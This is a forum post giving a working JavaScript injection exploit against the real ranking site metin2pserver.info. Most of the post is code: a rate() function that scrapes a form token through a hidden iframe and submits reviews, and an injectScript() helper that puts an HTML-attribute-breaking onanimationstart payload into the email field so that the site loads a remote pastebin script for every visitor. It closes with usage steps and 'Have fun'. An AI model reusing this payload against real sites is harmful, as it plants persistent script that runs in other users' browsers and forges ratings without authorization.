Jump to content

metin2pserver.info - Javascript Code Injection Example


Recommended Posts

Hi,

Here is a small example of a code injection on the top list: metin2pserver.info.

 

If you want to test it yourself:

 

I hosted the following script here ( https://pastebin.com/raw/28VjB803 ): 

 

/**
 * Rate.
 *
 * @param {string} serverId
 * @param {string} name
 * @param {string} email
 * @param {number} rating
 * @option 1 - Insufficient
 * @option 2 - Inadequate
 * @option 3 - Sufficient
 * @option 4 - Satisfying
 * @option 5 - Good
 * @option 6 - Very good
 * @param {string} comment
 * @param {number} picture
 * @option 1 - Warrior (m)
 * @option 2 - Warrior (f)
 * @option 3 - Ninja (m)
 * @option 4 - Ninja (f)
 * @option 5 - Sura (m)
 * @option 6 - Sura (f)
 * @option 7 - Shaman (m)
 * @option 8 - Shaman (f)
 */
function rate(serverId, name, email, rating, comment, picture = 1) {
    const root = document.documentElement;
    const iframe = document.createElement('iframe');
    iframe.style.setProperty('display', 'none');
    iframe.src = `https://www.metin2pserver.info/rate.php?id=${serverId}`;

    return new Promise((resolve) => {
        iframe.onload = () => {
            const [s] = iframe.contentDocument.getElementsByName('s');
            const token = s && s.value;

            root.removeChild(iframe);

            const data = {
                Name: name,
                Email: email,
                Rating: rating,
                Comments: comment,
                pic: picture,
                id: serverId,
                s: token,
            };

            const params = [];

            for (const param in data) {
                const value = data[param];
                params.push(encodeURIComponent(param) + '=' + encodeURIComponent(value));
            }

            const body = params.join('&');

            if (token) {
                fetch(iframe.src, {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
                    },
                    body,
                })
                    .then(() => resolve(true))
                    .catch(() => resolve(false));
            } else {
                resolve(false);
            }
        };

        root.appendChild(iframe);
    });
}

if (location.hash === '#methowashere') {
    const serverId = /server-(.*?).html/.exec(location.href)[1];

    const name = prompt('Your name');
    const comment = prompt('Your comment');

    rate(serverId, name, '', 1, comment);
}

To inject it, go to a server page (e. g.: https://www.metin2pserver.info/server-mt2aom2.html).
 

Launch this script on the page:

 

/**
 * Rate.
 *
 * @param {string} serverId
 * @param {string} name
 * @param {string} email
 * @param {number} rating
 * @option 1 - Insufficient
 * @option 2 - Inadequate
 * @option 3 - Sufficient
 * @option 4 - Satisfying
 * @option 5 - Good
 * @option 6 - Very good
 * @param {string} comment
 * @param {number} picture
 * @option 1 - Warrior (m)
 * @option 2 - Warrior (f)
 * @option 3 - Ninja (m)
 * @option 4 - Ninja (f)
 * @option 5 - Sura (m)
 * @option 6 - Sura (f)
 * @option 7 - Shaman (m)
 * @option 8 - Shaman (f)
 */
function rate(serverId, name, email, rating, comment, picture = 1) {
    const root = document.documentElement;
    const iframe = document.createElement('iframe');
    iframe.style.setProperty('display', 'none');
    iframe.src = `https://www.metin2pserver.info/rate.php?id=${serverId}`;

    return new Promise((resolve) => {
        iframe.onload = () => {
            const [s] = iframe.contentDocument.getElementsByName('s');
            const token = s && s.value;

            root.removeChild(iframe);

            const data = {
                Name: name,
                Email: email,
                Rating: rating,
                Comments: comment,
                pic: picture,
                id: serverId,
                s: token,
            };

            const params = [];

            for (const param in data) {
                const value = data[param];
                params.push(encodeURIComponent(param) + '=' + encodeURIComponent(value));
            }

            const body = params.join('&');

            if (token) {
                fetch(iframe.src, {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
                    },
                    body,
                })
                    .then(() => resolve(true))
                    .catch(() => resolve(false));
            } else {
                resolve(false);
            }
        };

        root.appendChild(iframe);
    });
}

/**
 * Inject.
 *
 * @param {string} script
 * @param {string} name
 */
function injectScript(script, name = 'Dummy') {
    const serverId = /server-(.*?).html/.exec(location.href)[1];
    const code = `$.getScript('${script}')`;
    const injection = `"style="animation:fb_transform"onanimationstart="${code}"`;

    console.log(`Server: ${serverId}`);
    console.log(`Name: ${name}`);
    console.log(`Script: ${script}`);
    console.log(`Injections: ${injection}`);

    return rate(serverId, name, injection, 1, '[...]');
}

You can then inject it like this:

 

injectScript('https://pastebin.com/raw/28VjB803').then((r) => console.log('Result: ', r));

You can then test it like this: https://www.metin2pserver.info/server-UGMT2.html#mailsywashere

 

Have fun ?

  • Metin2 Dev 1
  • Lmao 1
Link to comment
Share on other sites

Announcements



×
×
  • Create New...

Important Information

Terms of Use / Privacy Policy / Guidelines / We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.